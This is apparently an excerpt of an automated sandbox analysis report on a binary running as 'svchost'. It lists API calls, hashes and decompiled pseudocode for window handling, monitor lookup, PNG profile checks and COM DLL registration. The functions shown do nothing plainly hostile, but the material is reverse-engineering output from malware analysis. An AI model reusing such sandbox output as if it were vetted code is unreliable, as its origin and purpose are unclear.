    0x0041667e
    0x0041667e
    0x00416681
    0x00416683
    0x00000000
    0x00416689
    0x0041668b
    0x0041668d
    0x0041668f
    0x00416693
    0x00000000
    0x00416699
    0x00416699
    0x00416699
    0x004166a2
    0x004166a5
    0x004166aa
    0x004166b4
    0x004166bc
    0x004166c2
    0x004166cd
    0x004166e6
    0x004166ee
    0x004166fb
    0x00416705
    0x00416708
    0x0041670f
    0x00416716
    0x00416718
    0x0041671f
    0x00416721
    0x00416725
    0x00416729
    0x00416729
    0x0041672e
    0x00416733
    0x0041673a
    0x0041673d
    0x0041673f
    0x00416742
    0x00416749
    0x0041675e
    0x00416760
    0x00416773
    0x0041677a
    0x0041677f
    0x00416787
    0x00416789
    0x00416789
    0x00416762
    0x00416762
    0x00416764
    0x00000000
    0x00416766
    0x0041676c
    0x0041676c
    0x00416764
    0x0041674b
    0x00416750
    0x00416750
    0x0041678e
    0x00416796
    0x00416798
    0x00416798
    0x00416798
    0x0041679e
    0x004167a0
    0x0041684f
    0x0041686a
    0x004168a0
    0x004168a4
    0x004168a4
    0x004168a7
    0x004168a9
    0x00000000
    0x004167a6
    0x004167b9
    0x004167be
    0x004167c5
    0x00416805
    0x00416809
    0x0041680b
    0x00416811
    0x00416815
    0x00416975
    0x00416975
    0x00416979
    0x0041697b
    0x0041697e
    0x0041697e
    0x00416984
    0x00416986
    0x00416989
    0x00416989
    0x00416995
    0x00000000
    0x0041681b
    0x0041681b
    0x0041681e
    0x00416820
    0x00416827
    0x00000000
    0x0041682d
    0x0041682e
    0x00416834
    0x00416836
    0x00000000
    0x0041683c
    0x00416843
    0x00416847
    0x004168ad
    0x004168ad
    0x004168af
    0x0041699a
    0x0041699e
    0x004169a0
    0x004169a3
    0x004169a3
    0x004169a9
    0x004169ad
    0x004169af
    0x004169b2
    0x004169b2
    0x004169be
    0x004169c1
    0x004169ca
    0x004169ce
    0x004169d7
    0x004169db
    0x004169e4
    0x004169e8
    0x004169f1
    0x004169f5
    0x00000000
    0x004168b5
    0x004168ba
    0x004168c0
    0x004168cd
    0x004168d6
    0x004168da
    0x004168da
    0x004168db
    0x004168df
    0x00000000
    0x004168df
    0x004168af
    0x00416836
    0x00416827
    0x00416815
    0x004167a0
    0x00416693
    0x00416683
    0x0041665a
    0x0041665a
    0x0041665b
    0x004168e1
    0x004168e3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004168e3
    0x00000000
    0x00416658
    0x00000000
    0x0041662b
    0x00416625
    0x00416592
    0x004164b2
    0x004164b2
    0x004164b2
    0x004164bb
    0x004164be
    0x004164c5
    0x004164c8
    0x004164cc
    0x004164f1
    0x004164f1
    0x00000000
    0x004164dc
    0x004164e4
    0x0041650a
    0x00416510
    0x00416512
    0x0041653a
    0x0041654e
    0x00416514
    0x00416518
    0x0041652c
    0x0041652c
    0x004164e6
    0x004164ec
    0x00000000
    0x004164ec
    0x004164e4
    0x004164cc
    0x004164b0
    0x00000000

    APIs
    • IsWindow.USER32(?), ref: 004164D2
    • IsIconic.USER32(?), ref: 0041650A
    • SetActiveWindow.USER32(?), ref: 00416533
    • IsWindow.USER32(?), ref: 0041655D
    • IsWindow.USER32(?), ref: 0041682E
    • DestroyAcceleratorTable.USER32(?), ref: 0041697E
    • DestroyMenu.USER32(?), ref: 00416989
    • DestroyAcceleratorTable.USER32(?), ref: 004169A3
    • DestroyMenu.USER32(?), ref: 004169B2
    • DestroyAcceleratorTable.USER32(?), ref: 00416A12
    • DestroyMenu.USER32(?,000003EA,00000000,00000000,?,?,00000000,?,?,?,000007D9,00000000,00000000), ref: 00416A21
    • SetParent.USER32(?,?), ref: 00416AA3
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00416BBB
    • IsWindow.USER32(?), ref: 00416CEC
    • SendMessageA.USER32(?,0000806F,00000000,00000000), ref: 00416D01
    • SendMessageA.USER32(?,00008004,00000000,00000000), ref: 00416D1E
    • DestroyAcceleratorTable.USER32(?), ref: 00416D6C
    • IsWindow.USER32(?), ref: 00416DE1
    • IsWindow.USER32(?), ref: 00416E31
    • IsWindow.USER32(?), ref: 00416E81
    • IsWindow.USER32(?), ref: 00416EBE
    • IsWindow.USER32(?), ref: 00416F41
    • GetParent.USER32(?), ref: 00416F4F
    • GetFocus.USER32 ref: 00416F90
      • Part of subcall function 00416350: IsWindow.USER32(?), ref: 004163CB
      • Part of subcall function 00416350: GetFocus.USER32 ref: 004163D5
      • Part of subcall function 00416350: IsChild.USER32(?,00000000), ref: 004163E7
    • IsWindow.USER32(?), ref: 00416FEF
    • SendMessageA.USER32(?,00008076,00000000,00000000), ref: 00417004
    • IsWindow.USER32(00000000), ref: 00417017
    • GetFocus.USER32 ref: 00417021
    • SetFocus.USER32(00000000), ref: 0041702C
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Destroy$AcceleratorFocusTable$MenuMessageSend$Parent$ActiveChildIconic
    • String ID: d$^I
    • API String ID: 3681805233-2005080775
    • Opcode ID: c596810b0babb0a56e46ae2b0aa89afd2dc288bec558ce007c254d458f48989b
    • Instruction ID: a2acabba5accccb16bc631d157fb869babdf0dac69e13d3a178eac24b0571b6e
    • Opcode Fuzzy Hash: c596810b0babb0a56e46ae2b0aa89afd2dc288bec558ce007c254d458f48989b
    • Instruction Fuzzy Hash: E2729E71604301ABC320DF65C880BABB7E9EF84744F15492EF94997341DB78E985CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00440AB0 Relevance: 32.8, Strings: 26, Instructions: 305COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: BGR$ ZYX$ baL$Gray color space not permitted on RGB PNG$PCS illuminant is not D50$RGB color space not permitted on grayscale PNG$YARG$caps$intent outside defined range$invalid ICC profile color space$invalid embedded Abstract ICC profile$invalid rendering intent$invalid signature$knil$lcmn$length does not match profile$psca$rncs$rtnm$rtrp$tag count too large$tsba$unexpected DeviceLink ICC profile class$unexpected ICC PCS encoding$unexpected NamedColor ICC profile class$unrecognized ICC profile class
    • API String ID: 0-319498373
    • Opcode ID: a780bc4e599b10ba0b852387f01a942c4e697f2af1d0e36c32fd42bb4c40402b
    • Instruction ID: f64abc63492ce31e83bf76fe82787fd709467dddb3a18136b419ee78ffe879d1
    • Opcode Fuzzy Hash: a780bc4e599b10ba0b852387f01a942c4e697f2af1d0e36c32fd42bb4c40402b
    • Instruction Fuzzy Hash: 2E91CED360415017EB1CDE2D9C82AB77B959FC5301F1E84AAFA85CB303D029DA1586BD
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041EDD0 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 93libraryloaderwindowCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E0041EDD0(void* __ebx, void* __ecx) {
				int _t25;
				void _t28;
				void* _t31;
				void* _t34;
				intOrPtr* _t35;
				struct HINSTANCE__* _t50;
				intOrPtr* _t51;
				struct HWND__* _t52;
				void* _t53;
				void* _t54;

				_t34 = __ebx;
				_t53 = __ecx;
				if(IsIconic( *(__ecx + 0x1c)) != 0 || IsZoomed( *(_t53 + 0x1c)) != 0) {
					E00487621(_t53, 9);
				}
				E00487621(_t53, 3);
				 *(_t54 + 0x10) =  *(_t53 + 0x1c);
				_t51 = 0;
				_t50 = LoadLibraryA("User32.dll");
				if(_t50 == 0) {
					L9:
					SystemParametersInfoA(0x30, 0, _t54 + 0x14, 0);
					_t51 = _t54 + 0x14;
					goto L10;
				} else {
					_push(_t34);
					_t35 = GetProcAddress(_t50, "MonitorFromWindow");
					_t28 = GetProcAddress(_t50, "GetMonitorInfoA");
					 *(_t54 + 0x14) = _t28;
					if(_t35 != 0 && _t28 != 0) {
						_t31 =  *_t35( *(_t54 + 0x10), 2);
						if(_t31 != 0) {
							 *((intOrPtr*)(_t54 + 0x28)) = 0x48;
							 *((intOrPtr*)(_t54 + 0x1c))(_t31, _t54 + 0x28);
							_t51 = _t54 + 0x3c;
						}
					}
					FreeLibrary(_t50);
					if(_t51 != 0) {
						L10:
						_t23 =  *((intOrPtr*)(_t51 + 4));
						E004875D2(_t53, 0,  *_t51,  *((intOrPtr*)(_t51 + 4)),  *((intOrPtr*)(_t51 + 8)) -  *_t51,  *((intOrPtr*)(_t51 + 0xc)) - _t23, 4);
						_t52 =  *(_t54 + 0xc);
						_t25 = IsWindow(_t52);
						if(_t25 == 0) {
							return _t25;
						}
						return ShowWindow(_t52, 5);
					} else {
						goto L9;
					}
				}
			}













    0x0041edd0
    0x0041edd4
    0x0041ede4
    0x0041edf8
    0x0041edf8
    0x0041ee01
    0x0041ee0e
    0x0041ee12
    0x0041ee1a
    0x0041ee1e
    0x0041ee76
    0x0041ee81
    0x0041ee87
    0x00000000
    0x0041ee20
    0x0041ee20
    0x0041ee33
    0x0041ee35
    0x0041ee3d
    0x0041ee41
    0x0041ee4e
    0x0041ee52
    0x0041ee58
    0x0041ee62
    0x0041ee66
    0x0041ee66
    0x0041ee52
    0x0041ee6b
    0x0041ee74
    0x0041ee8b
    0x0041ee8b
    0x0041eea4
    0x0041eea9
    0x0041eeae
    0x0041eeb6
    0x0041eec7
    0x0041eec7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041ee74

    APIs
    • IsIconic.USER32(?), ref: 0041EDDC
    • IsZoomed.USER32(?), ref: 0041EDEA
    • LoadLibraryA.KERNEL32(User32.dll,00000003,00000009), ref: 0041EE14
    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0041EE27
    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0041EE35
    • FreeLibrary.KERNEL32(00000000), ref: 0041EE6B
    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0041EE81
    • IsWindow.USER32(?), ref: 0041EEAE
    • ShowWindow.USER32(?,00000005,?,?,?,?,00000004), ref: 0041EEBB
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AddressLibraryProcWindow$FreeIconicInfoLoadParametersShowSystemZoomed
    • String ID: GetMonitorInfoA$H$MonitorFromWindow$User32.dll
    • API String ID: 447426925-661446951
    • Opcode ID: 9b866950cf4ae0e0ddf9994e125894c7af0ed42c985e42d2cead146e9cf53f92
    • Instruction ID: 6ea14233788b89d44d0799521a3c1587d8e310ad3952d1cf443dee1c1a436cfc
    • Opcode Fuzzy Hash: 9b866950cf4ae0e0ddf9994e125894c7af0ed42c985e42d2cead146e9cf53f92
    • Instruction Fuzzy Hash: D3314175744301AFD7209F66DD49F6B77A8EB94B00F10882EB905A7281DBB8EC058769
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004181F0 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 310libraryregistryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 63%
    			E004181F0(signed int __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v72;
				char _v92;
				void* _v104;
				void* __ebp;
				char _t87;
				void* _t100;
				void* _t101;
				void* _t102;
				CHAR* _t110;
				_Unknown_base(*)()* _t111;
				intOrPtr _t125;
				void* _t128;
				void* _t137;
				void* _t141;
				void* _t148;
				intOrPtr* _t149;
				void* _t156;
				void* _t159;
				void* _t160;
				char* _t165;
				void* _t166;
				signed int _t171;
				unsigned int _t173;
				signed int _t174;
				intOrPtr _t180;
				char _t192;
				intOrPtr _t210;
				intOrPtr _t218;
				void* _t231;
				intOrPtr* _t233;
				void* _t237;
				intOrPtr* _t238;
				struct HINSTANCE__* _t239;
				void* _t241;
				void* _t242;
				void* _t243;
				intOrPtr _t244;
				void* _t245;
				void* _t249;
				void* _t250;

				_push(0xffffffff);
				_push(E0048E740);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t244;
				_t245 = _t244 - 0x4c;
				_v24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc4)) == 2) {
					L31:
					_t87 = 0;
					L32:
					 *[fs:0x0] = _v16;
					return _t87;
				}
				_t165 = _a8;
				if( *_t165 == 0) {
					goto L31;
				}
				asm("repne scasb");
				_t171 =  !(__ecx | 0xffffffff) - 1;
				E00471390(_t171 + 0x00000004 & 0x000000fc, _t171);
				asm("repne scasb");
				_t173 =  !(_t171 | 0xffffffff);
				_t237 = _a4 - _t173;
				_t174 = _t173 >> 2;
				memcpy(_t237 + _t174 + _t174, _t237, memcpy(_t245, _t237, _t174 << 2) & 0x00000003);
				_a8 = E004181B0(_t245, 0x23,  &_v28);
				_t238 = E004181B0(0, 0x23,  &_v28);
				_t100 = E004181B0(0, 0x23,  &_v28);
				_t249 = _t245 + 0x3c;
				_t231 = _t100;
				if(_t238 == 0) {
					L5:
					_t180 = _v24;
					_t210 =  *((intOrPtr*)(_t180 + 0xd8));
					_t101 = _t180 + 0xd8;
					_t181 =  *((intOrPtr*)(_t210 - 8));
					if( *((intOrPtr*)(_t210 - 8)) == 0) {
						L7:
						_push(0x4acca8);
						_push(_v24 + 0xd0);
						_push( &_v20);
						_t102 = E0048350B(_v24 + 0xd0);
						_push(_t165);
						_push(_t102);
						_v8 = 0;
						_push( &_a8);
						_t239 = LoadLibraryA( *(E0048350B(_v24 + 0xd0)));
						E004832C2( &_a8);
						_v8 = 0xffffffff;
						E004832C2( &_v20);
						if(_t239 == 0) {
							goto L31;
						}
						L8:
						_t110 = "DllRegisterServer";
						if(_a12 == 0) {
							_t110 = "DllUnregisterServer";
						}
						_t111 = GetProcAddress(_t239, _t110);
						if(_t111 != 0) {
							 *_t111();
							FreeLibrary(_t239);
							L13:
							if(_a12 != 0) {
								E00482580(_v24 + 0xdc,  *((intOrPtr*)(_v24 + 0xe4)), _a4);
								E00482580(_v24 + 0xf0,  *((intOrPtr*)(_v24 + 0xf8)), _t165);
							}
							_t87 = 1;
							goto L32;
						} else {
							FreeLibrary(_t239);
							goto L31;
						}
					}
					_push(_t165);
					_push(_t101);
					_push( &_a8);
					_t239 = LoadLibraryA( *(E0048350B(_t181)));
					E004832C2( &_a8);
					if(_t239 != 0) {
						goto L8;
					}
					goto L7;
				}
				_t125 =  *_t238;
				if(_t125 == 0 || _t125 == 0x7b) {
					goto L5;
				} else {
					if(_a12 == 0) {
						_t166 = E004709B8( &_v28, _t238);
						_t128 = E00471D40( &_v28, _t238, 0x2e);
						_t250 = _t249 + 0xc;
						if(_t128 == 0) {
							_t241 = 0;
						} else {
							_t137 = E004709B8( &_v28, _t128 + 1);
							_t250 = _t250 + 4;
							_t241 = _t137;
						}
						E0040B5D0( &_v92);
						_t190 = _a8;
						_push( &_v52);
						_push( &_v92);
						_v8 = 5;
						_push(E004204F0(_a8));
						if( *0x4926e0() >= 0) {
							 *0x4923b8( &_v52, _t166, _t241, E004709B8(_t190, _t231), 1);
						}
						_v8 = 0xffffffff;
						_v92 = 0x495e50;
						E0040B7D0( &_v92);
						_t87 = 1;
						goto L32;
					}
					_t192 =  *0x4b8924; // 0x4b8938
					_a8 = _t192;
					_v8 = 1;
					_v20 = 0;
					E0040B5D0( &_v72);
					_t233 =  *0x4923b0;
					_v8 = 2;
					_t242 = 0;
					do {
						if(_t242 != 0) {
							_push(_t165);
							if(_t242 != 1) {
								E004833FF( &_a8);
							} else {
								_push(_v24 + 0xd0);
								_push( &_v36);
								_t156 = E0048350B( &_v36);
								_v8 = 4;
								E004833AF( &_a8, _t243, _t156);
								_v8 = 2;
								E004832C2( &_v36);
							}
							L24:
							_push( &_v20);
							_push( &_v72);
							_t141 = E004204F0(_a8);
							_t249 = _t249 + 8;
							_push(_t141);
							if( *_t233() >= 0) {
								break;
							}
							_v20 = 0;
							goto L26;
						}
						_t218 = _v24;
						_t205 =  *((intOrPtr*)(_t218 + 0xd8));
						_t159 = _t218 + 0xd8;
						if( *((intOrPtr*)( *((intOrPtr*)(_t218 + 0xd8)) - 8)) == 0) {
							goto L26;
						}
						_push(_t165);
						_push(_t159);
						_push( &_v32);
						_t160 = E0048350B(_t205);
						_v8 = 3;
						E004833AF( &_a8, _t243, _t160);
						_v8 = 2;
						E004832C2( &_v32);
						goto L24;
						L26:
						_t242 = _t242 + 1;
					} while (_t242 < 3);
					if(_v20 == 0) {
						L30:
						_v8 = 1;
						_v72 = 0x495e50;
						E0040B7D0( &_v72);
						_v8 = 0xffffffff;
						E004832C2( &_a8);
						goto L31;
					}
					_t148 =  *0x4923b4(_v20, E004204F0(_a8),  &_v72, 0);
					_t149 = _v20;
					if(_t148 >= 0) {
						 *((intOrPtr*)( *_t149 + 8))(_t149);
						_v8 = 1;
						_v72 = 0x495e50;
						E0040B7D0( &_v72);
						_v8 = 0xffffffff;
						E004832C2( &_a8);
						goto L13;
					}
					 *((intOrPtr*)( *_t149 + 8))(_t149);
					goto L30;
				}
			}



















































    0x004181f3
    0x004181f5
    0x00418200
    0x00418201
    0x00418208
    0x00418217
    0x0041821a
    0x004184d7
    0x004184d7
    0x004184d9
    0x004184df
    0x004184ec
    0x004184ec
    0x00418220
    0x00418226
    0x00000000
    0x00000000
    0x00418236
    0x0041823a
    0x00418242
    0x00418250
    0x00418252
    0x00418258
    0x0041825c
    0x00418266
    0x00418277
    0x00418284
    0x0041828e
    0x00418293
    0x00418296
    0x0041829a
    0x004182aa
    0x004182aa
    0x004182b3
    0x004182b9
    0x004182bf
    0x004182c4
    0x004182e4
    0x004182e7
    0x004182f5
    0x004182f6
    0x004182f7
    0x004182fc
    0x004182fd
    0x00418301
    0x00418308
    0x00418316
    0x00418318
    0x00418320
    0x00418327
    0x0041832e
    0x00000000
    0x00000000
    0x00418334
    0x00418339
    0x0041833e
    0x00418340
    0x00418340
    0x00418347
    0x0041834f
    0x0041835d
    0x00418360
    0x00418366
    0x0041836b
    0x00418381
    0x00418394
    0x00418394
    0x00418399
    0x00000000
    0x00418351
    0x00418352
    0x00000000
    0x00418352
    0x0041834f
    0x004182c6
    0x004182c7
    0x004182cb
    0x004182d9
    0x004182db
    0x004182e2
    0x00000000
    0x00000000
    0x00000000
    0x004182e2
    0x0041829c
    0x004182a0
    0x00000000
    0x004183a3
    0x004183a8
    0x00418525
    0x00418527
    0x0041852c
    0x00418531
    0x00418541
    0x00418533
    0x00418535
    0x0041853a
    0x0041853d
    0x0041853d
    0x00418546
    0x0041854b
    0x00418554
    0x00418555
    0x00418557
    0x00418566
    0x0041856f
    0x00418583
    0x00418583
    0x0041858c
    0x00418593
    0x0041859a
    0x0041859f
    0x00000000
    0x0041859f
    0x004183ae
    0x004183b4
    0x004183ba
    0x004183c1
    0x004183c8
    0x004183cd
    0x004183d3
    0x004183d7
    0x004183d9
    0x004183db
    0x00418420
    0x00418421
    0x00418453
    0x00418423
    0x0041842e
    0x0041842f
    0x00418430
    0x00418439
    0x0041843d
    0x00418445
    0x00418449
    0x00418449
    0x00418458
    0x00418461
    0x00418462
    0x00418464
    0x00418469
    0x0041846c
    0x00418471
    0x00000000
    0x00000000
    0x00418473
    0x00000000
    0x00418473
    0x004183dd
    0x004183e0
    0x004183e6
    0x004183f1
    0x00000000
    0x00000000
    0x004183f7
    0x004183fb
    0x004183fc
    0x004183fd
    0x00418406
    0x0041840a
    0x00418412
    0x00418416
    0x00000000
    0x0041847a
    0x0041847a
    0x0041847b
    0x00418489
    0x004184b5
    0x004184b8
    0x004184bc
    0x004184c3
    0x004184cb
    0x004184d2
    0x00000000
    0x004184d2
    0x004184a2
    0x004184aa
    0x004184ad
    0x004184f2
    0x004184f8
    0x004184fc
    0x00418503
    0x0041850b
    0x00418512
    0x00000000
    0x00418512
    0x004184b2
    0x00000000
    0x004184b2

    APIs
    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,^I,?), ref: 004182D4
    • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,004ACCA8,?,?,?,?,?,?,00000000,^I,?), ref: 00418311
    • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00418347
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000000,^I,?), ref: 00418352
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000000,^I,?), ref: 00418360
    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0041846D
    • RegisterTypeLib.OLEAUT32(00000000,00000000), ref: 004184A2
    • 748D7540.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,^I,?), ref: 00418567
    • UnRegisterTypeLib.OLEAUT32(?,00000000,00000000,00000000,00000001), ref: 00418583
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Library$LoadType$FreeRegister$AddressD7540Proc
    • String ID: DllRegisterServer$DllUnregisterServer$^I
    • API String ID: 2717949743-2090745826
    • Opcode ID: 9058cb554e69bf5b41b2bf5bb7e84ca09058ef1cbdd2014496bf7d8543e51d82
    • Instruction ID: 304864cbbfaec3157424182ccc49b206ecfd5ba89950229d39b72da526fc2fc0
    • Opcode Fuzzy Hash: 9058cb554e69bf5b41b2bf5bb7e84ca09058ef1cbdd2014496bf7d8543e51d82
    • Instruction Fuzzy Hash: EDB1C271900209ABDF10EFA4C845BEF77B8EF54718F14852EF815A7281DF789A45CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00484376 Relevance: 13.6, APIs: 9, Instructions: 113COMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E00484376(intOrPtr* __ecx) {
				void* __esi;
				signed int _t40;
				struct HWND__* _t45;
				signed int _t49;
				signed char _t54;
				struct HWND__* _t56;
				struct HINSTANCE__* _t61;
				void* _t63;
				void* _t74;
				intOrPtr* _t78;
				void* _t80;
				void* _t82;

				E00473304(E00490C80, _t80);
				_t78 = __ecx;
				 *((intOrPtr*)(_t80 - 0x10)) = _t82 - 0x18;
				 *((intOrPtr*)(_t80 - 0x1c)) = __ecx;
				_t74 =  *(__ecx + 0x44);
				 *(_t80 - 0x18) =  *(__ecx + 0x48);
				_t40 = E0048C6BF();
				_t61 =  *(_t40 + 0xc);
				if( *(_t78 + 0x40) != 0) {
					_t61 =  *(E0048C6BF() + 0xc);
					_t40 = LoadResource(_t61, FindResourceA(_t61,  *(_t78 + 0x40), 5));
					_t74 = _t40;
				}
				if(_t74 != 0) {
					_t40 = LockResource(_t74);
					 *(_t80 - 0x18) = _t40;
				}
				if( *(_t80 - 0x18) != 0) {
					 *(_t80 - 0x14) = E004842FA(_t78);
					E0048519E();
					__eflags =  *(_t80 - 0x14);
					 *(_t80 - 0x20) = 0;
					if( *(_t80 - 0x14) != 0) {
						_t56 = IsWindowEnabled( *(_t80 - 0x14));
						__eflags = _t56;
						if(_t56 != 0) {
							EnableWindow( *(_t80 - 0x14), 0);
							 *(_t80 - 0x20) = 1;
						}
					}
					_push(_t78);
					 *(_t80 - 4) = 0;
					E00485152();
					_t45 = E00484092(_t78,  *(_t80 - 0x18), E00484C84(_t80,  *(_t80 - 0x14)), _t61);
					__eflags = _t45;
					if(_t45 != 0) {
						__eflags =  *(_t78 + 0x24) & 0x00000010;
						if(( *(_t78 + 0x24) & 0x00000010) != 0) {
							_t63 = 4;
							_t54 = E004874EA(_t78);
							__eflags = _t54 & 0x00000001;
							if((_t54 & 0x00000001) != 0) {
								_t63 = 5;
							}
							_push(_t63);
							E00486E8F(_t78);
						}
						__eflags =  *(_t78 + 0x1c);
						if( *(_t78 + 0x1c) != 0) {
							E004875D2(_t78, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
					__eflags =  *(_t80 - 0x20);
					if( *(_t80 - 0x20) != 0) {
						EnableWindow( *(_t80 - 0x14), 1);
					}
					__eflags =  *(_t80 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t78 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t80 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t78 + 0x58))();
					E00484334(_t78, _t78, __eflags);
					_t49 =  *(_t78 + 0x2c);
				} else {
					_t49 = _t40 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t49;
			}















    0x0048437b
    0x00484385
    0x00484388
    0x0048438b
    0x00484391
    0x00484394
    0x00484397
    0x004843a0
    0x004843a3
    0x004843aa
    0x004843bb
    0x004843c1
    0x004843c1
    0x004843c5
    0x004843c8
